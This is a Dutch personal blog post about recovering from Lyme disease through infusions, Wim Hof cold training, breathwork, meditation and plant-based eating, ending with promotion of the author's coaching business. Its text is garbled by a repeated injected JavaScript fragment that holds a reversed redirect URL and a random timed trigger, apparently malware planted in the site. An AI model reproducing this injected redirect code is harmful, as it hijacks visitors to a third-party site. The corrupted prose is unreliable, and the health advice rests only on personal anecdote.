Persoonlijk Update gezondheid en behandeling

Herstellen van de ziekte van Lyme?

De afgelopen jaren hebben in het teken gestaan van herstellen van Lyme. Ik heb in 2018 mijn laatste bericht hier geschreven. Ik was toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toen net weer aan het werk en dat viel me best wel zwaar. Maar wat was ik blij dat het weer kon na zo’n tijd ziek thuis te zijn geweest. Na zo’n tijd vond ik het eigenlijk tijd voor een update. Waarschijnlijk wel de laatste update die ik geef, maar het is wel een hele belangrijke. Hierin vertel ik de dingen die mij enorm hebben geholpen bij mijn herstel en de start van mijn eigen bedrijf Your Inner Sparkle. Iets waar ik ontzettend trots op ben.

Succesverhalen

Toen ik nog zo ziek was, was ik altijd op zoek naar de succesverhalen. Maar deze kon ik haast nergens vinden. Dit maakte dat ik steeds minder hoop kreeg dat je zou kunnen herstellen van de ziekte van Lyme. Mijn ervaring nu is dat toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toen het beter met me ging, ik absoluut zo min mogelijk terug wilde denken aan de tijd dat ik ziek was. Ik wilde niet geconfronteerd worden met ziekte en wilde mijn blik vooruit hebben. Naar de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toekomst. Stapje voor stapje zorgen dat ik zou gaan herstellen. Hier op mijn blog updates geven was het laatste wat ik wilde, want ik voelde heel sterk dat dit me niet vooruit zou gaan helpen. Precies dit is denk ik dan ook de reden dat er zo weinig succesverhalen te vinden zijn. Niet omdat ze er niet zijn, maar omdat mensen waar het beter mee gaat zich zo min mogelijk willen bezig houden met hoe het was. Ik heb even getwijfeld mijn blog offline te halen. Maar hij wordt nog steeds bezocht en daarom heb ik besloten om hier nog een laatste keer een bericht te schrijven over hoe het nu gaat en waar ik mee bezig ben.

Hoe het nu gaat

De afgelopen jaren ben ik met vallen en opstaan steeds een klein beetje verder vooruit gekomen. Ik heb nog steeds niet het energieniveau wat ik had voor ik ziek werd en af en toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe doet mijn lichaam nog steeds raar en blijk ik kwetsbaar als ik de balans tussen rust en activiteit niet goed in de gaten hou. Maar over de grote lijn ben ik absoluut vooruit gegaan. Er zijn een aantal dingen die mij enorm hebben geholpen hierbij. Laat ik voorop stellen dat mijn infuusbehandelingen de grootste rol hebben gespeeld. Want die hebben ervoor gezorgd dat ik stabiel ben geworden en de mogelijkheid heb gekregen om zelf heel hard te gaan werken aan mijn herstel. Stabiel worden is absoluut de basis.

Een cadeautje

Het klinkt misschien voor sommigen wat zweverig, maar nu terugkijkend heb ik de absolute overtuiging dat ik niet voor niks ziek ben geworden. Mijn leven liep eigenlijk op alle vlakken niet lekker en eigenlijk was ik ook niet gelukkig. Doordat alles onder mij vandaan werd geslagen heb ik de mogelijkheid gekregen om helemaal opnieuw te beginnen en mijn leven in te richten in hoe het bij mij past. Ik ben diep naar binnen gekeerd en dat heeft een hele grote rol gespeeld in hoe het nu met mij gaat. Ik zeg altijd: blijft het hierbij, dan is het ziek worden echt een cadeautje gebleken. Ik ben nu, met al mijn gekke beperkingen, gelukkiger dan ooit.

Wat heeft mij geholpen bij het herstellen van de ziekte van Lyme?

Hieronder volgen wat tips en wie weet heb je er iets aan!

Koudetraining

Ik heb een aantal jaar geleden mee kunnen doen aan de Wim Hof Lyme Trial. Hier is mijn passie geboren voor koudetraining. Ik kwam er achter dat ik zo ontzettend veel sterker was dan ik altijd dacht. Zo ziek als ik was, ging ik toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch maar in dat ijsbad. En het gaf mij zo veel energie. De kou is een hele mooie spiegel en leert je naar binnen keren en in je lichaam komen, iets wat mensen met chronische pijnklachten vaak niet goed kunnen. In combinatie met de Wim Hof ademhalingsoefeningen heeft dit mij ontzettend veel gebracht.

Trauma release door ademwerk en lichaamswerk

Jarenlang heb ik rond gelopen met het gevoel dat ik delen uit mijn verleden niet goed had verwerkt. Gesprekken met psychologen en EMDR behandeling leverden geen resultaat. Ik kon goed vertellen over wat ik had meegemaakt, maar ik voelde er helemaal niks bij. Betekende dit dan dat ik het gewoon al verwerkt had? Diep van binnen wist ik van niet en wist ik ook dat ik bij de pijn zou moeten zien te komen om echt te kunnen helen. Pas als je voelt kan je loslaten.
Maar hoe doe je dit? Ik leerde dat de adem hierbij een heel mooi instrument is.
Tijdens een ademsessie ging ik steeds een stuk dieper in mezelf. Nadenken ging niet meer, alleen voelen bleef over. En toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toen ineens was ik daar. Ik kwam terecht in een stukje van mezelf waar de meest diepe pijn en verdriet zat die ik ooit had gevoeld. Ik kon niet anders dan het voelen en huilen, huilen, huilen. Ik had geen idee waarom, maar er was zo’n intens verdriet dat ik niet anders kon. Toen ik rustiger werd voelde ik alleen maar een enorme opluchting. Er was letterlijk een stukje van de last die ik bij me droeg opgelost in mijn tranen. En toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toen wist ik het. Mijn pad was bepaald. De adem zal mij helpen bij het helen. Ook lichaamswerk kan hier heel veel bij doen. Stress en trauma wordt opgeslagen in je lichaam en door middel van lichaamswerk kan je dit loslaten. Beide methoden hebben mij ontzettend veel gebracht.

Meditatie

In mijn hoofd zitten twijfels, angsten, zorgen, onzekerheden en niet helpende gedachten. Meditatie helpt mij om deze gedachten te zien zoals ze zijn: niet meer dan gedachten die komen en gaan. Door te mediteren hebben gedachten steeds minder controle op je. Meditatie helpt mij in connectie te komen met mezelf, uit mijn hoofd te gaan en mijn lichaam beter te voelen. Ik probeer dagelijks te mediteren en de perioden dat het lukt merk ik ook dat ik steeds sneller in volledige rust kom. Vakantie in mijn eigen hoofd noem ik dat altijd!

Plantaardig eten

Een paar jaar geleden ben ik gestoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topt met het eten van vlees en vis en grotendeels andere dierlijke producten (ongeveer 85%). Ik merkte dat dit heel veel deed met mijn energieniveau. Elk lichaam is anders, maar ik zou zeker eens uitproberen wat dit voor je doet!

Your Inner Sparkle

Logo your innersparkle

Tijdens een retraite een tijdje terug voelde ik zo sterk dat ik wat moet gaan doen met de dingen die mij zo geholpen hebben. Als ik praat over koudetraining, ademwerk en lichaamswerk ga ik aan. Ik krijg energie, mijn ogen gaan stralen en ik loop over van enthousiasme. Ik wil mijn passie gaan leven en mensen gaan helpen! Ik ben dan ook begonnen als zzp-er en ben mijn eigen bedrijf gestart: Your Inner Sparkle. Ik help mensen met stress en trauma release door middel van lichaamswerk en ademwerk en ik doe ijsbad coaching. Ben je benieuwd, neem dan eens een kijkje op de website van Your Inner Sparkle. En stuur mij gerust een berichtje als je meer wilt weten of interesse hebt. Nu weet ik uit ervaring dat veel mensen die chronisch ziek zijn niet veel te besteden hebben. Hier valt altijd over te praten, dus laat dat je niet tegen houden een berichtje te sturen. Je kunt me ook volgen op mijn Facebook pagina en Instragram pagina.

Facebook reacties

1 Reactie

 • Reply
  Karin Jansen
  17 oktober 2021 at 19:12

  Hoi Marleen, wat ontzettend fijn dat het zo goed met je gaat én wat ontzettend herkenbaar. Als je zo diep zit wil je alles lezen, horen, vinden, maar als het dan eindelijk goed gaat, wil je vergeten dat je ooit zo ziek was. Heel veel geluk en plezier gewenst vanuit het zonnetje

 • Leave a Reply

  Deze site gebruikt Akismet om spam te verminderen. Bekijk hoe je reactie-gegevens worden verwerkt.

  %d bloggers liken dit: